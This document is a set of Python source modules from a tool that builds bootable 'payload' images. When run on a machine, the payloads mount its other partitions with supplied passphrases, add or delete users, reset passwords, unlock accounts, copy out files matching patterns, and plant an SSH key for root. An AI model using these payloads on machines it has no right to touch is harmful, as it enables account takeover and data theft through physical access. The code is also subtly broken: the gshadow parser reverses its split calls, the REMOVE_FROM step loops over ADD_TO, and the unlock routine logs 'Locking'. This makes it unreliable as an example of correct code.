"""
Prepare rootfs for payload generation
"""
import os
import tarfile
import tempfile

from snr.core.core import common_paths, context, options
from snr.core.payload_generation import common
from snr.core.util import common_utils, programs

__all__ = (
    "prepare_rootfs",
)


def prepare_rootfs(ctx: context.Context) -> bool:
    """Prepare rootfs for payload generation.

    Args:
        ctx: Context

    Returns:
        Whatever operation was successful or not
    """
    common_utils.print_info("Preparing for payload generation")
    common_utils.print_debug("Unpacking rootfs image")
    root_directory = tempfile.mkdtemp(prefix="snr")
    mount = programs.Mount(
        sudo=True,
        stdout=programs.PIPE,
        stderr=programs.STDOUT)
    errorcode = mount.invoke_and_wait(
        None, ctx.construct_partition_path(3), root_directory)

    if errorcode != 0:
        assert mount.stdout is not None
        common_utils.print_debug("Mounting rootfs failed")
        common_utils.print_debug(
            f"Command's output: {mount.stdout.read()}")
        return common.clean_and_exit(ctx, "Copying rootfs to target failed", True)
    common_utils.print_debug(f"Rootfs is mounted at: {root_directory}")
    if not os.access(root_directory, os.W_OK):
        return common.clean_and_exit(ctx, "Rootfs mount point is not writable")
    ctx.to_level_3(root_directory)
    common_utils.print_debug(
        f"Extracting rootfs {common_paths.ROOTFS_ARCHIVE_PATH} to {root_directory}")
    try:
        with tarfile.open(common_paths.ROOTFS_ARCHIVE_PATH, common_paths.ROOTFS_ARCHIVE_FORMAT) as tar_stream:
            tar_stream.extractall(root_directory)
    except Exception as exc:  # pylint: disable=broad-exception-caught
        return common.clean_and_exit(ctx, f"Unpacking rootfs image failed ({exc})")
    for directory in ["bin", "lib", "var", "root"]:
        if not ctx.exists(directory):
            return common.clean_and_exit(ctx, "Archive did not extract correctly", True, True)
    common_utils.print_debug("Preparing rootfs")
    common_utils.print_debug("Writing hostname")
    with common_utils.rootfs_open(ctx, "etc/hostname", "w") as stream:
        stream.write(options.default_hostname + "\n")
    common_utils.print_debug("Writing dns configuration")
    with common_utils.rootfs_open(ctx, "etc/resolv.conf", "w") as stream:
        stream.write(f"nameserver {options.default_primary_nameserver}\n"
                     f"nameserver {options.default_secondary_nameserver}\n"
                     )
    return True



"""
Clean interface to gshadow entries and a few utility functions
"""
import copy
import os.path

__all__ = (
    "UnixGShadowEntry", "parse_unix_gshadow_line",
    "parse_unix_gshadow_file", "format_unix_gshadow_line",
    "format_unix_gshadow_file"
)


class UnixGShadowEntry:  # pylint: disable=too-many-instance-attributes, too-few-public-methods
    """A shadow group entry

    Attributes:
        group_name: Name of the group
        password: Password of the group
        administrators: List of users that have admin privileges of the group
        members: List of normal members of the group
        locked: Whatever users can use the password to add themselves
          to the group dynamically or not
    """
    group_name: str
    password: str
    administrators: list[str]
    members: list[str]
    locked: bool

    def __init__(self, group_name: str, password: str,  # pylint: disable=too-many-arguments
                 administrators: list[str], members: list[str],
                 locked: bool):
        self.group_name = group_name
        self.password = password
        self.administrators = copy.deepcopy(administrators)
        self.members = copy.deepcopy(members)
        self.locked = locked

    def __str__(self) -> str:
        locked_str = ""
        if self.locked:
            locked_str = "!"
        return f"{self.group_name}:{locked_str}{self.password}:" + \
            f"{','.join(self.administrators)}:{','.join(self.members)}"


def parse_unix_gshadow_line(line: str) -> UnixGShadowEntry:
    """Parse a gshadow line and return a UnixGShadowEntry

    Args:
        line: The line to parse

    Returns:
        The parsed UnixPasswdEntry
    """
    group_name, password, administrators_raw, members_raw = line.split(":", 4)
    administrators = ",".split(administrators_raw)
    members = ",".split(members_raw)
    locked = False
    if password.startswith("!"):
        password = password[1:]
        locked = True
    return UnixGShadowEntry(group_name, password, administrators, members, locked)


def parse_unix_gshadow_file(root: str = "/") -> list[UnixGShadowEntry]:
    """Parse the gshadow file and return list of gshadow objects

    Args:
        root: Root of the directory to look for gshadow file

    Returns:
        list of gshadow objects
    """
    gshadow_file = os.path.join(root, "etc", "gshadow")
    gshadows = []
    with open(gshadow_file, encoding="utf-8") as stream:
        for line in stream.readlines():
            if len(line.strip()) != 0:
                gshadows.append(parse_unix_gshadow_line(line))
    return gshadows


def format_unix_gshadow_line(gshadow: UnixGShadowEntry) -> str:
    """Format a UnixGShadowEntry for use in /etc/gshadow.

    Args:
        gshadow: The UnixGShadowEntry to format.

    Returns:
        The formatted string representation of the UnixGShadowEntry
    """
    return str(gshadow)


def format_unix_gshadow_file(gshadows: list[UnixGShadowEntry]) -> str:
    """Format a list of gshadow objects for use in /etc/shadow.

    Args:
        gshadows: list of gshadows to format

    Returns:
        string with formatted gshadow file
    """
    output = ""
    for passwd in gshadows:
        output += str(passwd) + "\n"
    return output



"""
Context for specific mount point
"""

from snr.core.core import path_wrapper

__all__ = (
    "Context",
)


class Context(path_wrapper.PathWrapperBase, path_var_name="_root_directory"):
    """Context for specific mount point

    Context is used to pass information on a mount point around.
    It is used both in payload generation process and extensively by payload.
    It's better than using a simple dictionary because it allows to 
    have depths of knowledge about the mount point (levels), this is required
    because during the payload generation process, the information is discovered in 3 steps
    and this method ensures better access checks

    Attributes:
        level: Current information level about the mount point
    """
    level: int = 0
    _original_target: str
    _device_name: str
    _device_size: int
    _is_device: bool
    _partitions_prefix: str
    _root_directory: str

    def __init__(self, device_name: str):  # pylint: disable=super-init-not-called
        self._device_name = device_name
        self._original_target = device_name

    def to_level_1(self, device_size: int, is_device: bool) -> None:
        """Update the information to level 1

        Args:
            device_size: Size of the device
            is_device: Whatever device_name actually points to a device or is a file
        """
        self.level = 1
        self._device_size = device_size
        self._is_device = is_device

    def to_level_2(self, partitions_prefix: str) -> None:
        """Update the information to level 2

        Args:
            partitions_prefix: Prefix before partitions index
        """
        self.level = 2
        self._partitions_prefix = partitions_prefix

    def to_level_3(self, root_directory: str) -> None:
        """Update information to level 3

        Args:
            root_directory: The path which the partition is mounted
        """
        self.level = 3
        self._root_directory = root_directory

    @property
    def original_target(self) -> str:
        """Original target passed"""
        return self._original_target

    @property
    def device_name(self) -> str:
        """Device name, could be loop"""
        return self._device_name

    @device_name.setter
    def device_name(self, device_name: str) -> None:
        self._device_name = device_name

    @property
    def device_size(self) -> int:
        """Size of the device, could be zero if context is created on a host system"""
        if self.level >= 1:
            return self._device_size
        raise RuntimeError("Context does not yet have device_size")

    @property
    def is_device(self) -> bool:
        """Whatever device_name points to an actual device, not a file"""
        if self.level >= 1:
            return self._is_device
        raise RuntimeError("Context does not yet have is_device")

    @is_device.setter
    def is_device(self, is_device: bool) -> None:
        self._is_device = is_device

    @property
    def partitions_prefix(self) -> str:
        """The prefix in which is needed to access partitions on /dev with device_name"""
        if self.level >= 2:
            return self._partitions_prefix
        raise RuntimeError("Context does not yet have partitions_prefix")

    @property
    def root_directory(self) -> str:
        """The root directory which the context is based on"""
        if self.level >= 3:
            return self._root_directory
        raise RuntimeError("Context does not yet have root_directory")

    def construct_partition_path(self, index: str | int, original_target: bool = False) -> str:
        """Construct a partition file path

        Args:
            index: Partition index in partition table
            original_target: Whatever to use original_target instead of device_name. 
              Use this if you absolutely are sure original_target is not a 
              file and uses the same partition prefix. Defaults to True.

        Returns:
            Path to the requested partition
        """
        if original_target:
            return f"{self.original_target}{self.partitions_prefix}{index}"
        return f"{self.device_name}{self.partitions_prefix}{index}"



#!/usr/bin/python3
"""
User_management payload
"""

import os

from snr.core.payload import (context, data_dir, entry_point, storage,
                              unix_group, unix_passwd)
from snr.core.util import chroot_programs, common_utils

PAIRS = "@PAIRS@"
USERS = "@USERS@"
GROUPS = "@GROUPS@"
ADD_TO = "@ADD_TO@"
REMOVE_FROM = "@REMOVE_FROM@"
SHELLS = "@SHELLS@"
UNLOCK = "@UNLOCK@"
PASSPHRASES = "@PASSPHRASES@"
DEFAULT_PASSWORD = "@DEFAULT_PASSWORD@"

deluser_factory = chroot_programs.chroot_program_wrapper_factory("deluser")
adduser_factory = chroot_programs.chroot_program_wrapper_factory("adduser")
chpasswd_factory = chroot_programs.chroot_program_wrapper_factory("chpasswd")
chsh_factory = chroot_programs.chroot_program_wrapper_factory("chsh")
usermod_factory = chroot_programs.chroot_program_wrapper_factory("usermod")
delgroup_factory = chroot_programs.chroot_program_wrapper_factory("delgroup")
addgroup_factory = chroot_programs.chroot_program_wrapper_factory("addgroup")


def lookup_username_by_uid(uid: int | str, mounted_part: storage.MountedPartition) -> str:
    passwd = unix_passwd.parse_unix_passwd_file(mounted_part.mount_point)
    for entry in passwd:
        if str(entry.uid) == str(uid):
            return entry.login_name
    common_utils.print_warning(f"Looking up user by UID ({uid}) failed!")
    return ""


def lookup_group_name_by_gid(gid: int | str, mounted_part: storage.MountedPartition) -> str:
    group = unix_group.parse_unix_group_file(mounted_part.mount_point)
    for entry in group:
        if str(entry.gid) == str(gid):
            return entry.group_name
    common_utils.print_warning(f"Looking up group by GID ({gid}) failed!")
    return ""


def ensure_username(identifier: str, mounted_part: storage.MountedPartition) -> str:
    if identifier.startswith("*"):
        return lookup_username_by_uid(identifier[1:], mounted_part)
    return identifier


def ensure_group_name(identifier: str, mounted_part: storage.MountedPartition) -> str:
    if identifier.startswith("*"):
        return lookup_group_name_by_gid(identifier[1:], mounted_part)
    return identifier


def backup_login_info(part: str, suffix: str, mounted_part: storage.MountedPartition, block_info: list[storage.BlockInfo]) -> None:
    part_info = storage.query_partition_info_by_path(part, block_info)
    assert part_info is not None
    part_data = data_dir.wrap_data_path_for_block(part_info)
    for file in ("passwd", "shadow", "group", "gshadow"):
        with open(os.path.join(mounted_part.mount_point, "etc", file),
                  encoding="utf-8") as stream:
            data = stream.read()
        with part_data.open(file + suffix, "w") as stream2:
            stream2.write(data)


def del_user(username: str, ctx: context.Context, mounted_part: storage.MountedPartition) -> None:
    username = lookup_username_by_uid(username[1:], mounted_part)
    if len(username) == 0:
        return
    common_utils.print_info(
        f"Deleting user '{username}'")
    errorcode = deluser_factory(ctx)(
        stdout=chroot_programs.PIPE).invoke_and_wait(None, username)
    if errorcode != 0:
        common_utils.print_warning(
            f"Deleting user '{username}' failed!")


def add_user(username: str, ctx: context.Context, _: storage.MountedPartition) -> None:
    common_utils.print_info(f"Adding user '{username}'")
    adduser = adduser_factory(ctx)(
        stdin=chroot_programs.PIPE, stdout=chroot_programs.PIPE)
    adduser.invoke(username)
    assert adduser.stdin is not None
    adduser.stdin.write(DEFAULT_PASSWORD)
    for __ in range(6):
        adduser.stdin.write("\n")
    errorcode = adduser.wait(None)
    if errorcode != 0:
        common_utils.print_warning(
            f"Adding user '{username}' failed!")


def change_password(user_pass_pair: str, ctx: context.Context, mounted_part: storage.MountedPartition) -> None:
    user, password = user_pass_pair.split(";", maxsplit=1)
    user = ensure_username(user, mounted_part)
    if len(user) == 0:
        return
    common_utils.print_info(f"Changing password of '{user}'")
    chpasswd = chpasswd_factory(ctx)(
        stdin=chroot_programs.PIPE)
    chpasswd.invoke()
    assert chpasswd.stdin is not None
    chpasswd.stdin.write(f"{user}:{password}\n")
    chpasswd.stdin.close()
    errorcode = chpasswd.wait(None)
    if errorcode != 0:
        common_utils.print_warning(
            f"Changing password for '{user}' failed!")


def change_shell(user_shell_pair: str, ctx: context.Context, mounted_part: storage.MountedPartition) -> None:
    user, shell = user_shell_pair.split(":", maxsplit=1)
    user = ensure_username(user, mounted_part)
    if len(user) == 0:
        return
    common_utils.print_info(
        f"Changing default shell of '{user}'")
    errorcode = chsh_factory(ctx)().invoke_and_wait(None, user,
                                                    options={
                                                        "shell": shell
                                                    })
    if errorcode != 0:
        common_utils.print_warning(
            f"Changing default shell of 'user '{user}' failed!")


def lock_user(username: str, ctx: context.Context, mounted_part: storage.MountedPartition) -> None:
    username = ensure_username(username, mounted_part)
    if len(username) == 0:
        return
    common_utils.print_info(f"Locking user '{username}'")
    errorcode = usermod_factory(ctx)().invoke_and_wait(None, username,
                                                       options={
                                                           "lock": None
                                                       })
    if errorcode != 0:
        common_utils.print_warning(
            f"Locking user '{username}' failed!")


def unlock_user(username: str, ctx: context.Context, mounted_part: storage.MountedPartition) -> None:
    username = ensure_username(username, mounted_part)
    if len(username) == 0:
        return
    common_utils.print_info(f"Locking user '{username}'")
    errorcode = usermod_factory(ctx)().invoke_and_wait(None, username,
                                                       options={
                                                           "unlock": None
                                                       })
    if errorcode != 0:
        common_utils.print_warning(
            f"Locking user '{username}' failed!")


def del_group(group_name: str, ctx: context.Context, mounted_part: storage.MountedPartition) -> None:
    group_name = ensure_group_name(group_name, mounted_part)
    if len(group_name) == 0:
        return
    common_utils.print_info(
        f"Deleting group '{group_name}'")
    errorcode = delgroup_factory(ctx)(
        stdout=chroot_programs.PIPE).invoke_and_wait(None, group_name)
    if errorcode != 0:
        common_utils.print_warning(
            f"Deleting group '{group_name}' failed!")


def add_group(group_name: str, ctx: context.Context, _: storage.MountedPartition) -> None:
    common_utils.print_info(f"Adding group '{group_name}'")
    errorcode = addgroup_factory(ctx)(
        stdout=chroot_programs.PIPE).invoke_and_wait(None, group_name)
    if errorcode != 0:
        common_utils.print_warning(
            f"Adding group '{group_name}' failed!")


def add_user_to_group(user_group_pair: str, ctx: context.Context, mounted_part: storage.MountedPartition) -> None:
    username, group_name = user_group_pair.split(":", maxsplit=1)
    username = ensure_username(username, mounted_part)
    group_name = ensure_group_name(group_name, mounted_part)
    common_utils.print_info(
        f"Adding user '{username}' to group '{group_name}'")
    errorcode = adduser_factory(
        ctx)().invoke_and_wait(None, username, group_name)
    if errorcode != 0:
        common_utils.print_warning(
            f"Adding user '{username}' to group '{group_name}' failed!")


def remove_user_from_group(user_group_pair: str, ctx: context.Context, mounted_part: storage.MountedPartition) -> None:
    username, group_name = user_group_pair.split(":", maxsplit=1)
    username = ensure_username(username, mounted_part)
    group_name = ensure_group_name(group_name, mounted_part)
    common_utils.print_info(
        f"Removing user '{username}' from group '{group_name}'")
    errorcode = deluser_factory(
        ctx)().invoke_and_wait(None, username, group_name)
    if errorcode != 0:
        common_utils.print_warning(
            f"Removing user {username} from group {group_name} failed!")


@entry_point.entry_point
def main() -> None:
    block_info, _, our_device = storage.setup()
    common_utils.print_info("User_management payload started")
    for part in storage.query_all_partitions(block_info):
        if storage.get_partition_root(part, block_info) == our_device:
            continue
        with storage.mount_partition(part, PASSPHRASES) as mounted_part:
            if (mounted_part.exists("usr/sbin/init")
                or mounted_part.exists("usr/bin/init")) \
                    and mounted_part.exists("etc/shadow"):
                # Take a copy of passwd,shadow,group and gshadow files
                common_utils.print_info(
                    "Backing up user and group data (before version)")
                backup_login_info(part, ".before", mounted_part, block_info)
                try:
                    ctx = context.require_context_for_mount_point(
                        mounted_part.mount_point)
                except SystemExit:
                    continue
                # The order we should change things:
                # 1. USERS
                # 2. PAIRS
                # 3. SHELLS
                # 4. UNLOCK
                # 5. GROUPS
                # 6. ADD_TO
                # 7. REMOVE_FROM
                # This way, we cannot end up breaking ourselves

                # USERS
                for username in USERS:
                    if username.startswith("-"):
                        del_user(username[1:], ctx, mounted_part)
                    else:
                        add_user(username, ctx, mounted_part)
                # PAIRS
                for user_pass_pair in PAIRS:
                    change_password(user_pass_pair, ctx, mounted_part)
                # SHELLS
                for user_shell_pair in SHELLS:
                    change_shell(user_shell_pair, ctx, mounted_part)
                # UNLOCK
                for username in UNLOCK:
                    if username.startswith("-"):
                        lock_user(username[1:], ctx, mounted_part)
                    else:
                        unlock_user(username, ctx, mounted_part)
                # GROUPS
                for group_name in GROUPS:
                    if group_name.startswith("-"):
                        del_group(group_name[1:], ctx, mounted_part)
                    else:
                        add_group(group_name, ctx, mounted_part)
                        # ADD_TO
                for user_group_pair in ADD_TO:
                    add_user_to_group(user_group_pair, ctx, mounted_part)
                # REMOVE_FROM
                for user_group_pair in ADD_TO:
                    remove_user_from_group(user_group_pair, ctx, mounted_part)

                common_utils.print_info(
                    "Backing up user and group data (after version)")
                backup_login_info(part, ".after", mounted_part, block_info)
    common_utils.print_ok("User_management payload completed")


if __name__ == "__main__":
    main()



#!/usr/bin/python3
"""
Files payload
"""
import glob

from snr.core.payload import data_dir, entry_point, storage
from snr.core.util import common_utils

PATTERNS = "@PATTERNS@"
PASSPHRASES = "@PASSPHRASES@"


@entry_point.entry_point
def main() -> None:
    block_info, _, our_device = storage.setup()
    common_utils.print_info("Files payload started")
    for part in storage.query_all_partitions(block_info):
        if storage.get_partition_root(part, block_info) == our_device:
            continue
        with storage.mount_partition(part, PASSPHRASES) as mounted_part:
            part_info = storage.query_partition_info_by_path(part, block_info)
            assert part_info is not None
            part_data = data_dir.wrap_data_path_for_block(part_info)
            for pattern in PATTERNS:
                paths = glob.glob(pattern, root_dir=mounted_part.mount_point,
                                  recursive=True)
                common_utils.print_info(
                    f"Pattern '{pattern}' resulted into {len(paths)} matches. Copying...")
                for path in paths:
                    src_path = mounted_part.join(path)
                    # Remake the structure
                    # If the matched path is a directory, just pass it to makedirs
                    # If it is a file, create it's parents, and then copy the file
                    if part_data.isdir(path):
                        part_data.makedirs(path)
                        # Copy the whole tree
                        part_data.copytree(
                            src_path, path, ignore_dangling_symlinks=True, dirs_exist_ok=True)
                    else:
                        part_data.makedirs(part_data.dirname(path))
                        part_data.copy(src_path, path)
    common_utils.print_ok("Files payload completed")



"""
Non-interactive interface for snr
"""

import click
from snr.cli import interactive_shell, main as cli_main

# pylint: disable=protected-access


def _filter_out_params(params: list[click.Parameter]) -> list[click.Parameter]:
    new_params = []
    for param in params:
        keep = True
        for opt in param.opts:
            if opt in ("--init", "--reinit", "--init-only", "--init-if-needed"):
                keep = False
        if keep:
            new_params.append(param)
    return new_params


def main() -> None:
    """Main function of snrgen"""
    payload_option = click.Option(["--payload", "-p"],
                                  required=True,
                                  help="Payload to load")
    define_option = click.Option(["--define", "-d", "defines"],
                                 multiple=True,
                                 help="Variables to define")
    output_option = click.Option(["--output", "-o"],
                                 required=True,
                                 help="Output file or device")
    # First patch up both main and interactive_shell to ensure they don't parse options they are not meant
    cli_main._main.params = [payload_option, define_option, output_option,
                             *_filter_out_params(cli_main._main.params)]
    interactive_shell.interactive_shell.params = [payload_option, define_option, output_option,
                                                  *_filter_out_params(interactive_shell.interactive_shell.params)]
    cli_main._main.help = "Non-interactive interface to snr"
    cli_main.main()



if __name__ == "__main__":
    main()



"""
Create a SSH server
"""

from snr.core.payload.payload import Context, Payload


class SSHServerPayload(Payload):
    AUTHORS = ("GlobularOne",)
    TARGET_OS_LIST = ("Any",)
    INPUTS = (
        ("PUBLIC_KEY", "", -1, "Public key for key-based authentication", True),
    )
    DEPENDENCIES = (
        "openssh-server",
    )

    def generate(self, ctx: Context) -> int:
        variables = self.get_self_variables()
        ctx.makedirs("root/.ssh")
        with ctx.open("root/.ssh/authorized_keys", "w") as stream:
            stream.write(variables["PUBLIC_KEY"])
        return 0


payload = SSHServerPayload()



"""
Configure snr core on the host
"""

import configparser

from snr.core.core import context
from snr.core.util import common_utils

__all__ = (
    "configure_core",
)


def configure_core(ctx: context.Context, verbosity: str) -> bool:
    """Configure snr core on the host

    Args:
        ctx: Context
        verbosity (str): Verbosity level
    """
    common_utils.print_debug("Configuring snr core on the host")
    # Ensure these directories exist
    for directory in [
            "root/.config/snr",
            "root/.cache/snr",
            "root/.local/state/snr",
            "root/.local/share/snr"]:
        common_utils.print_debug(
            f"Creating directory on the host: {directory}")
        ctx.makedirs(directory, exist_ok=True)
    config_parser = configparser.ConfigParser()
    data = {
        "main": {
            "verbose": False,
            "quiet": False,
            "debug": False,
        }
    }
    match verbosity:
        case "verbose":
            data["main"]["verbose"] = True
        case "quiet":
            data["main"]["quiet"] = True
        case "debug":
            data["main"]["verbose"] = True
            data["main"]["debug"] = True
        case "normal":
            pass
        case _:
            common_utils.print_error("Unknown verbosity mode")
            return False

    config_parser.read_dict(data)
    common_utils.print_debug("Writing configuration file to host rootfs")
    with common_utils.rootfs_open(ctx, "root/.config/snr/main.conf", "w") as stream:
        config_parser.write(stream)
    return True



"""
Payload generation core functionality
"""
from typing import Callable

from snr.core.core import context
from snr.core.payload import safety_pin
from snr.core.payload_generation.post import (core_configuration, finishing,
                                              grub_installation)
from snr.core.payload_generation.pre import (ensuring_dependencies, formatting,
                                             host_check, partitioning,
                                             rootfs_preparation)

__all__ = (
    "payload_generation_pre", "payload_generation_post"
)


def _call_step(func: Callable[[context.Context], bool], ctx: context.Context) -> None:
    return_value = func(ctx)
    if not return_value:
        raise RuntimeError(f"Step failed with return code: {return_value}")


def payload_generation_pre(ctx: context.Context) -> bool:
    """Do pre payload generation steps

    Args:
        ctx: Context

    Returns:
        Whatever the steps were successful or not
    """
    try:
        _call_step(host_check.check_host, ctx)
        _call_step(partitioning.partition_host, ctx)
        _call_step(formatting.format_host, ctx)
        _call_step(rootfs_preparation.prepare_rootfs, ctx)
        _call_step(ensuring_dependencies.ensure_dependencies, ctx)
    except RuntimeError:
        return False
    return True


def payload_generation_post(ctx: context.Context, verbosity: str) -> bool:
    """Do post payload generation steps

    Args:
        ctx: Context
        verbosity: Either "normal", "quiet", "verbose" or "debug"

    Returns:
        Whatever the steps were successful or not
    """
    safety_pin.remove_safety_pin(ctx.root_directory)
    try:
        core_configuration.configure_core(ctx, verbosity)
        grub_installation.install_grub(ctx)
        finishing.finish_host(ctx)
        _call_step(rootfs_preparation.prepare_rootfs, ctx)
        _call_step(ensuring_dependencies.ensure_dependencies, ctx)
    except RuntimeError:
        return False
    return True



"""
/data directory support
"""
import os
import os.path
from typing import IO, Any

import deprecated

from snr.core.core import path_wrapper
from snr.core.payload import storage
from snr.core.util import programs

__all__ = (
    "data", "fix_data_dir",
    "data_open", "data_mkdir"
)

data = path_wrapper.PathWrapperBase("/data")


def fix_data_dir() -> None:
    """Ensure a writable /data directory.
    If the rootfs is mounted writable, it does nothing.
    Otherwise it mounts a temporary in-ram filesystem on /data
    """
    try:
        os.mkdir("/data/_fix_data_dir_test")
    except PermissionError:
        programs.Mount().invoke_and_wait(None, "tmpfs",
                                         "/data", options={"t": "tmpfs"})
    else:
        os.rmdir("/data/_fix_data_dir_test")


@deprecated.deprecated("Use data.open instead", version="1.1.0")
def data_open(file: str, mode: str = "r", buffering: int = -1, encoding: str | None = None) -> IO[Any]:
    """Open a file in the data directory

    Args:
        file: The name of the file to open.
        mode: The mode to open the file in.
        buffering: The buffering size in bytes.
        encoding: The encoding to use.

    Returns:
        file-like object
    """
    return data.open(file, mode, buffering, encoding)


@deprecated.deprecated("Use data.mkdir instead", version="1.1.0")
def data_mkdir(dir_path: str, mode: int = 511) -> None:
    """Create a directory if it doesn't exist
    Args:
        path: Path to the directory to create
        mode: Permissions to set for the directory
    """
    return data.mkdir(dir_path, mode)


def wrap_data_path_for_block(info: storage.BlockInfo) -> path_wrapper.PathWrapperBase:
    """Wrap a new path for a specific block

    Args:
        info: Information on the block

    Returns:
        Wrapped path specific to that block
    """
    if info.uuid is not None:
        identifier = info.uuid
    else:
        identifier = info.path.replace("/", ".")[1:]
    data.makedirs(identifier, exist_ok=True)
    return data.wrap(identifier)
